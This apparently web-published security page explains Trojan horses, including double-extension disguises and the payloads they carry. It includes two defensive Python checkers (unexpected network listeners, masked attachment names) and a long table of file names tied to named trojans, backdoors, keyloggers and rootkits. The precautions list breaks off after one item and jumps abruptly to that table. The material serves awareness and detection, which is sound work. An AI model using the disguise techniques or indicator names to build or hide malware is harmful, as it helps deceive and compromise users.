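        found.add((proto, addr, int(port)))
    return found


def unexpected_listeners(netstat_text, expected=EXPECTED, ignore_loopback=True):
    """Return sorted listeners that are not on the allowlist.

    Loopback-only binds are skipped by default because they cannot be
    reached from the network; pass ignore_loopback=False to see them too.
    """
    out = []
    for proto, addr, port in listening_sockets(netstat_text):
        if ignore_loopback and addr.startswith("127."):
            continue
        if (proto, port) not in expected:
            out.append((proto, addr, port))
    return sorted(out)


if __name__ == "__main__":
    for proto, addr, port in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener: {proto} {addr}:{port}")
```

Run it against real output by piping `netstat -an` into a file and passing its contents to `unexpected_listeners`; anything it prints is a port the firewall should be blocking or a program that needs explaining.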
Trojan (bad) Beware!!!!
Trojan horse: well, this term has many meanings.
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware , like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic System Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically set up a hidden server, to which a hacker with a client can then log on. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse's extension might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above not only installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, whenever any of the music CDs carrying it were played on a Windows computer system.
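The 'Readme.txt.exe' trick described above, together with the advice in the precautions list to check attachments before opening them, can be turned into a gateway-side check. The following is an added example, not code from the original post: it flags attachment names whose final extension is one Windows will execute and which carry a benign-looking extension in front of it, and shows what Explorer would display with known extensions hidden. The extension sets and the sample names are assumptions chosen for the demo; several of the sample names echo names that appear in this page's examples and trojan file list.

```python
"""Flag attachment names that hide an executable extension behind a benign one.

Added example, not from the original post. The extension sets are assumed for
the demo: the executable set follows the page's .exe/.com/.scr/.bat/.pif list,
plus script-host types (.vbs/.js/.hta/.cmd) that Windows also runs directly.
"""
import os

# Extensions Windows will execute when double-clicked (assumed set, see above).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif", ".vbs", ".js", ".hta", ".cmd"}

# Extensions a user reads as a harmless document, picture or media file.
DECOY_EXTS = {".txt", ".doc", ".jpg", ".jpeg", ".gif", ".avi", ".mp3", ".html", ".htm", ".zip", ".pdf"}


def split_all_exts(name):
    """Return the lowercase extension chain of a filename: 'a.TXT.exe' -> ['.txt', '.exe']."""
    base = os.path.basename(name)
    parts = base.lower().split(".")
    if len(parts) < 2:
        return []
    return ["." + p for p in parts[1:] if p]


def classify(name):
    """'masked' if an executable extension hides behind a decoy extension,
    'executable' if the name is plainly executable, otherwise 'ok'."""
    exts = split_all_exts(name)
    if not exts or exts[-1] not in EXECUTABLE_EXTS:
        return "ok"
    # A decoy-looking extension anywhere before the real one is the masking trick.
    if any(e in DECOY_EXTS for e in exts[:-1]):
        return "masked"
    return "executable"


def displayed_name(name):
    """What Explorer shows with 'Hide extensions for known file types' on:
    the last extension is dropped, so 'Readme.txt.exe' appears as 'Readme.txt'."""
    base = os.path.basename(name)
    root, ext = os.path.splitext(base)
    return root if ext else base


def scan(names):
    """Return (name, verdict, shown_as) for every name that is not 'ok'."""
    findings = []
    for n in names:
        verdict = classify(n)
        if verdict != "ok":
            findings.append((n, verdict, displayed_name(n)))
    return findings


# Constructed sample attachment names; the flagged ones echo names used on this page.
SAMPLE_NAMES = [
    "Readme.txt.exe",
    "waterfalls.scr.exe",
    "Movie.avi.pif",
    "Annakournikova.jpg.vbs",
    "REQUESTED_INFO.DOC.vbs",
    "quarterly_report.pdf",
    "holiday.jpg",
    "setup.exe",
]

if __name__ == "__main__":
    for name, verdict, shown in scan(SAMPLE_NAMES):
        print(f"{verdict:10s} {name:28s} (shown as {shown!r})")
```

Note that 'waterfalls.scr.exe' is reported as plainly executable rather than masked: .scr is itself an executable screensaver type, so the name never looked like a document in the first place. A mail filter would typically quarantine both verdicts and let only 'ok' names through.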

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are:
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
uploading and downloading files.
allowing remote access to the victim's computer. This is called a RAT (remote administration tool).
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
taking screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phishing for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing the CD-ROM tray.

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through e-mail, much like other types of common viruses. The only difference, of course, is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so if you see e-mail from someone you know that does not necessarily make it safe.

Size (bytes) File name Trojan
0 Changelog Back Orifice Communications Library
0 Bla.bla BLA trojan
0 Ipn.101 DataRape
0 Nam.101 DataRape
0 Por.101 DataRape
0 Udp.101 DataRape
5 Disk1.id NetBus 2.0 Pro
6 sniff.pid Shaft
8 Anam.101 DataRape
9 Lastip.sdf Snid
10 Stamp-h.in Back Orifice Communications Library
10 Cd-it.zip Warpcom
12 Snid.ini Snid
14 Ghlope.ini UandMe
15 Vclcntl.dll AOL Buddy
23 Runme.bat Modem Jammer
23 Resource.h.dsg Oblivion Dropper Source Generator
24 Paradise.ini Masters Paradise
26 Io.dll Retribution
26 Sprocks.bmp Retribution
26 Diskf.dll Retribution
26 Reginf.ret Retribution
26 Subseven.set SubSeven 2.2
27 Winstart.bat CrazzyNet
28 Module1.bas Log
31 Setup.ini NetBus 2.0 Pro
31 Install.bat Trojan Hide Tool
39 Pack.cmd Logger
40 Client.ini NokNok
43 Closew.bat 2000 Cracks
43 Readme.txt Alcarys.G
44 Acconfig.h Xremote
46 Apxi.dll ICQ Pager
46 Tools.kip SubSARI
47 Pcinvader.cfg PC Invader
47 Trojan.vbw TailGunner
49 Autopoll.ini Masters Paradise
49 Setup.lid Mos**ker
50 Pack_off.h Back Orifice Communications Library
51 Explorer.exe Reven
52 Acid setup.vbw Acid Shivers
52 Script.mrc neXus
54 Pl.bat Eversaw
56 D[censored].ini Donald [censored]
56 Icqcrk.gif Paradise trojan
62 Nettrash.ini NetTrash
62 Oxon.ini Oxon
62 St5unst.exe WinGrab
64 Dir.txt BackGate Kit
64 Winini.tmp - 8,554 bytes Drone.cfg Pioneer
64 Newvbs.reg Worms Generator
66 Connector.exe.sig Connector
68 Pref.ini Frenzy
68 Pwmodify.dat PsychWard
69 Setup.ini Mos**ker
70 Defs.h Back Orifice Communications Library
71 Win.drv BuggyWorm
72 Dedicado A.....txt Zevach
73 Rsrc.dsg Oblivion Dropper Source Generator
75 clear yoyo
83 Th3tr41t0r.vbw The Traitor (= th3tr41t0r)
89 Cha_du_ri.bat WCup
89 Dd.ini WCup
93 Password.txt Frethem
96 Dosya.kip SubSARI
97 Includes.dsg Oblivion Dropper Source Generator
101 Deltree.dll MuSka52
108 Ctcp.mrc neXus
111 00000001.COM On4ever
111 00000002.COM On4ever
111 00000003.COM On4ever
111 00000004.COM On4ever
112 Register.reg RUX The TIc.K
113 Config Guangwai Ghost
113 Necuser3.tye HD trojan
114 V.vbs Alcarys.G
114 Install.bat Blood Fest Evolution
117 Cfgwin32.reg BO dll
118 Register.reg RTB 666
119 Data.tag Mos**ker
120 Doc.dll MuSka52
122 Rsrc.rc BSE
122 Agent.ini Cyber Sensor
125 Index.reg Bitchin Threads
126 Xp.bat Jerm
127 Make.bat Rux
127 Korea_rulez.vbs WCup
132 -infect-.p$ NetBus
134 Start.cmd Logger
134 Korea_win_worldcup2002.vbs WCup
137 Fooled.com Fooled
138 Setup.pkg NetBus 2.0 Pro
142 Install.bat Hvl RAT
146 Start.bat Alcarys.G
150 Qskrypt1.qsc Q-taz
150 Koreans_.reg WCup
160 File_id.diz Cybernetic Cowb0y´s NetBus
160 Srver.exe The Invasor
161 Nix.cnt The Nix
164 Crazzynet.ini CrazzyNet
166 Makefile.am Back Orifice Communications Library
170 Log.mak Log
178 Ftpcmds.txt BackGate Kit
178 File_id.diz NetBus 2.0 Pro
189 Pddt.dat Mini BackLash
190 Pack_on.h Back Orifice Communications Library
192 Bofacil.ini BO Facil
196 Medusa.mrc Medusa
202 Settings.dll Ass Sniffer
206 Psetup.dat Progenic Mail Trojan Construction Kit
210 Startadore Adore rootkit
226 Autoftp.ini Autoftp1
227 Dl.1bat BackGate Kit
227 Carla.txt.vbs Zevach
228 Fooled.zip Fooled
230 Lee Esto!.txt Zevach
233 Crack.reg ASPack
233 Flelist.xml Nakter Affe
237 Autoftp1.vbw Autoftp1
246 Prog.ini Trapdoor
249 Hookdump.ini Hookdump
254 Register.reg AccKontrol
254 Register.reg Black Angel
263 Module1.bas EH trojan
265 Trojan.com RBBS
280 Wckoat.sig Trojan Hide Tool
286 Jokes.trj EasyTrojan
286 Fix.bat Rathead
288 Config.h.in Xremote
289 Compile.bat PECompact
298 *.sig Silk Rope
301 Options.ini Connect4
302 Commands.cfg Undetected
314 Gimmerand.c ADM worm
317 Syphillisserver.dpr Syphillis
322 File_id.diz neXus
324 Startup.lnk Pando
329 Acub.dll A-trojan
333 VIERIKA.JPG.VBS Vierika
344 Login.txt BackGate Kit
344 03.d BackGate Kit
348 Config.ini Gip
351 Script.ini BuggyWorm
353 Layout.bin Mos**ker
362 Config.h Xremote
369 Uploader.bat Rux
370 Changelog Xremote
378 Cdecl.h Back Orifice Communications Library
379 s**ker.trj EasyTrojan
386 Explorer.cfg ZA Killer
396 Solffcor.sh Solaris rootkit
397 Vbs_f**k.zip f**k
400 Install.log Trojan Hide Tool
406 Ddoly121.zip Doly Trojan
417 Os.dat Mos**ker
428 V.reg Alcarys.G
433 Pack.bat Connect4
433 Qtrodel.zip QtroDel / QreoDel
445 Wsock32.bat BuggyWorm
450 Msvbvm60.dll Daodan
454 Cr.vbs Eversaw
454 Readme.vbs Snav
456 Resource.h Enigma´s Setup Trojan
457 Resource.h Silk Rope
461 Mirc.fire.490.zip Fire
464 Skin.ini SubSeven
470 Plugex.dpr Undetected
482 Index.htm DSS
486 Timer98.bat Funtime Apocolypse
487 Secto.com Sector-Zero
492 Timernt.bat Funtime Apocolypse
527 Kcr.com KCR
528 Attacker.cfg Attacker
533 HTML_Shit.zip Shit Trojan
536 Aweblite.zip Aphex WebDownloader LITE
537 Servustartuplog.txt BackGate Kit
545 Gimmeip ADM worm
546 Vbs.rabbit.zip Rabbit
547 Setuptrojan.dsw Enigma´s Setup Trojan
553 Skin.ini Undetected
586 Ecat.com ECat
594 Element.txt Elem
595 Nerte.cnt NerTe
610 Com2exe.com Rux
616 Send.tgz Remote Administration Tool - RAT
630 Trojan_Shit.htm Shit Trojan
632 Skin.ini Backage
662 Calculus.exe Calculus
663 Satas.mrc SataS Scan Script
668 Trojan17.exe FliMod
670 Startup ADM worm
672 Acid setup.vbp Acid Shivers
678 About.com Gnotify
686 Ipxkcr.com KCR
686 Wprinter spitter.com Printer Spitter
688 Playkcr.com KCR
689 BlackDay.bat BlackDay
696 Bo2k-defs.h.in Back Orifice Communications Library
703 Chkperm.txt Solaris rootkit
710 Evilhtml_2.zip Evil HTML Format
721 S7config.cfg SubSeven 2.2
722 Mkinstalldirs Back Orifice Communications Library
726 Int09mon.com 9x Int 09 Moniter
730 DestroyerNT.zip God
763 Config.h.in Back Orifice Communications Library
764 Mdlstartup.bas Autoftp1
765 Incremental ADM worm
766 Element.ico Elem
768 Systrayicon.exe SubSeven
772 Libbo2k.dsw Back Orifice Communications Library
773 Qtaz20pl.diz Q-taz
774 Makefile.gen Adore rootkit
776 Prosiak.ini Prosiak
779 En-cid12.dat The 1-900 Trojan
781 Qtaz22.diz Q-taz
781 Qtaz23.diz Q-taz
797 Urls.ini neXus
801 Clientootlt.vbp EH trojan
807 All-root.zip allroot
809 Netbus.cnt NetBus 2.0 Pro
812 Backage32se.bagage Backage
823 Rat10.zip Remote Administration Tool - RAT
824 Xtratank.com Xtratank
825 Remotecntrl.mrc neXus
839 Nor.wps Alcarys.G
843 Christina_aguilera_nude!.vbs Reaper
844 Libbo2kspec Back Orifice Communications Library
844 Freejc.exe Free JC suite
846 Freejc2.exe Free JC suite
847 Libbo2k.spec.in Back Orifice Communications Library
852 Serverootlt.vbp EH trojan
868 Crack4jc.exe Free JC suite
872 Outlookjs.class GodWill
879 Backage3.ini Backage
887 Extract.dsg Oblivion Dropper Source Generator
888 Natas.url Natas
899 Aboutblank.htm Blank
915 Config.h Back Orifice Communications Library
926 V.com LFM-926
928 Email.vbs BuggyWorm
930 Audpserver A UDP backdoor
942 Malkavian.url Lucky2
958 Icqcrack.zip Apulia
964 Audpbackdoor.tar.gz A UDP backdoor
964 Geax105.com GetIt Keylogger
965 Strhandle.h Back Orifice Communications Library
967 Coldir.com Coldir trojan
967 Read-me.pif Golden Retriever
987 Th3tr41t0r.vbp The Traitor (= th3tr41t0r)
992 EX_Folder.zip EX_Folder
993 AOL4free.com AOL4FREE
996 Ghostdog.zip GhostDog
1008 Overquota.bat OverQuota
1014 All-root.c allroot
1014 Procspy.ini Cyber Sensor
1019 Getitsdw.com GetIt Keylogger
1024 Server.exe Mini Web Downloader
1028 Dailupraper.dep Dunrape
1032 Rat11.zip Remote Administration Tool - RAT
1035 Audpclient A UDP backdoor
1046 Win95.exe Free JC suite
1052 Winnt.exe Free JC suite
1055 Evilhtml2.zip Evil HTML Format
1067 Skin.ini Mos**ker
1076 Mskernel32.vbs Dayumi
1076 Gssh101.com GetIt Keylogger
1078 Icon1.ico Enigma´s Setup Trojan
1088 Alloyico.dll Alloy Executable Compiler
1088 Boy95.com SpyBoy
1094 Bad.dat Got You
1095 (version C) Pica
1100 17th.Inst.zip 17th.Inst
1122 Oggy_froggy1_2.zip Oggy Froggy
1137 Lame.cpp Lame
1148 Evil98.html Evil HTML Share
1148 Wing.ini WinGrab
1152 Screen.tpu EasyTrojan
1165 Setup.ini Alloy Executable Compiler
1169 Protools.com PECompact
1184 Miranda.zip Miranda
1187 Movie.avi.pif Homemade
1195 lbk.tar.gz lbk
1204 Winf**k.zip Winf**k
1218 Menu.cfg SubSeven 2.2
1235 Destroyernt.txt God
1243 Playkcr.zip KCR
1257 Trojan.vbp TailGunner
1281 Funtime95.hta Funtime Apocolypse
1281 Funtiment.hta Funtime Apocolypse
1285 Without.bat Without
1292 Ibug.ini neXus
1300 98sfix.bat Control trojan
1325 Ghostdog.com GhostDog
1330 Getitkeyloggsdw100r.zip GetIt Keylogger
1333 Passcrypt.zip QueBus
1339 Winf**k.bat Winf**k
1345 T0rnsb T0rn Rootkit
1357 Kcr.zip KCR
1366 EX_Folder.bat EX_Folder
1374 Giant.frm EH trojan
1382 Sz T0rn Rootkit
1383 Blitz.c BlitzNet
1408 Catman.com Catman trojan
1408 General.tpu EasyTrojan
1429 Configure.in Back Orifice Communications Library
1443 Skisetup.log Stealth Keyboard Interceptor Auto Sender
1454 Picard.vbs Lee
1455 Ffb24.c Solaris rootkit
1458 Modregistry.bas The Traitor (= th3tr41t0r)
1470 Ns.com Hackin' for Newbies
1478 Ipxkcr.zip KCR
1483 Scanconnect.c ADM worm
1489 Lion24.c Solaris rootkit
1489 Zip-troj.zip Zip trojan
1492 Commands.cfg Undetected
1511 Winsck.ini GateCrasher
1517 Teenslideshow.scr Sinep
1517 Winsystem.vbs Sinep
1531 Sam.htm Emailtips
1536 ~df127d.tmp CrazzyNet
1551 REQUESTED_INFO.DOC.vbs Req
1560 Commandloop.h Back Orifice Communications Library
1566 Cmoney.com Resizer
1578 Fservecheat.zip SubSeven scripts
1594 Evilnt.html Evil HTML Share
1594 Trojanrunnernt.txt God
1640 Lemon24.c Solaris rootkit
1668 Annhiliatent.txt God
1673 Evilhtml.zip Evil HTML Format
1690 Dtv31-lite-client.ini Deep Throat
1710 Script1.rc Enigma´s Setup Trojan
1710 Saranwrap.rc NokNok
1710 Silkrope.rc Silk Rope
1728 Uninstal.ini NetBuster Killer
1732 Ntshareme.html Evil HTML Share
1753 98shareme.html Evil HTML Share
1771 Miranda.com Miranda
1773 Multimedia.lte Multimedia, Lithium plug-in
1795 Plugins.h Back Orifice Communications Library
1807 Dccf**k.zip SubSeven scripts
1826 gH-cgi.c gH CGI Backdoor
1829 Xls.wps Alcarys.G
1836 Humanismo.html.vbs Manis
1858 Form3.frx The Traitor (= th3tr41t0r)
1877 FOTOS_YABRAN_VIVO_HOY.JPG.vbs Yabran
1917 Evil.html Evil HTML Format
1926 Runmenow.com HD trojan
1929 Trojan.frm TailGunner
1944 Frmcompleted.frm Autoftp1
1948 (B)Independance_Day.vbs Lee
1949 Utrojan.c Universal trojan
1950 Blank.html. 321 bytes Doc.wps Alcarys.G
1957 Dummy.c Adore rootkit
1971 Gravedad.zip Gravedad
2009 Deisl1.isu Trojan Hide Tool
2031 Bocomreg.h Back Orifice Communications Library
2035 Cleaner.c Adore rootkit
2037 Acid setup.zip Acid Shivers
2061 Pif worm emmapeel.zip Emma Peel
2063 English.ini Masters Paradise
2070 Cartolina.vbs Cartolina
2083 Upgradetowindowsxp.bat Jerm
2140 Notify.php Nawai
2143 Splash2.jpg GayOL
2146 Supernovae.999.zip SuperNova
2177 Autoftp1.vbp Autoftp1
2190 Hellyeah.zip Hellfirez
2192 Passwd_irix.c Password trojan
2195 Ds9.vbs Lee
2244 xmas.vbs Jean
2261 Cinstall.com Host Control
2275 Sys32.exe Cable
2278 El15_bmp.exe El15 BMP
2288 Commnet.h Back Orifice Communications Library
2296 Remote.ini neXus
2303 Stuff.mrc neXus
2310 Avkiller2.zip AVKillah
2317 Friend_message.txt.vbs FriendMess
2336 Illwill_info.exe Nawai
2336 Dod.mrc neXus
2353 Mirko.bat Krim
2355 Rush.tcl BlitzNet
2361 Beerwyrm.vbs Beerwyrm
2370 Edit_cfg.wri FTP SMTP
2383 Slist.mrc neXus
2392 Destroyer98.txt God
2407 Msinet.dep Cero
2407 Uninstal.ini Sensive
2417 Whatsnew.300 PKZip Trojan
2417 Freemp3s.vbs Resreg
2420 VBS.Lava.vbs Fiber
2422 VBS.Lava.vbs Fiber
2436 Homepage.html.vbs Homepage
2465 Mswinsck.dep Cero
2472 Frmlogin.fram Autoftp1
2494 Dropper.com Brebarka
2506 Imagehlp.dll MTX II
2519 Deutsch.ini Masters Paradise
2555 Pricol.exe Pricol
2576 Iohandler.h Back Orifice Communications Library
2592 Ocx.reg BusConquerer
2592 Ocx.reg NetBuster Killer
2592 Ocx.reg Psyber Stream Server
2601 Libinvisible.h Adore rootkit
2606 Kernel32.vbs PWStroy
2643 El15bmp.zip El15 BMP
2644 Worm_Elva.zip Elva
2649 Xremote.1 Xremote
2655 Breberka.txt .vbe Brebarka
2686 System.dll.vbs Bajar.B
2705 Vue testing service.txt.zip GhostDog
2709 Xremote.spec Xremote
2729 Psrace.c Solaris rootkit
2734 Annhiliate98.txt God
2734 Ircworm-julie.zip Julie
2758 Qfatc.zip Qfat
2784 Tsrpart.tpu EasyTrojan
2795 pp.pl Shaft
2803 kbdv2.c Linux loadable kernel module backdoor
2823 Oggy_fro.bat Oggy Froggy
2850 Encryption.h Back Orifice Communications Library
2853 Annakournikova.jpg.vbs OntheFly
2888 Nlc.mrc neXus
2918 Replace.mrc neXus
2922 Win32.cpp Back Orifice Communications Library
2922 Regclean.exe.js Olvort
2922 Regclean.exe.js Olvortex
2933 Brahma.jpg.vbs Rahma
2944 Serverootlt.frm EH trojan
2951 Cool_notepad_demo.txt.vbs CoolNote
2968 Configure Adore rootkit
2999 kbd.c Linux loadable kernel module backdoor
3008 Hosts.ip neXus
3008 Hosts.ip NokNok
3036 Nogzoeen.exe Nogzoeen
3062 Log.cgi Net-Devil CGI-logger
3072 Tloader1.exe K2 Turbo Loader
3072 Vbrun4x.dll K2 Turbo Loader
3072 Lang.exe Langex
3072 Webasylum.exe Web Asylum
3072 Server.exe WWWPW
3085 Trojanrunner98.txt God
3095 Upsddown.zip UpSideDown
3097 Folder.html Challenge
3104 Pager.exe ICQ Pager
3116 El15_bmp.zip El15 BMP
3124 17th.Inst.htm 17th.Inst
3141 Ban24.c Solaris rootkit
3178 Mawanella.vbs Mawanella
3193 Linkage.h Back Orifice Communications Library
3219 Dict.smp FTP SMTP
3232 Install.exe HD troj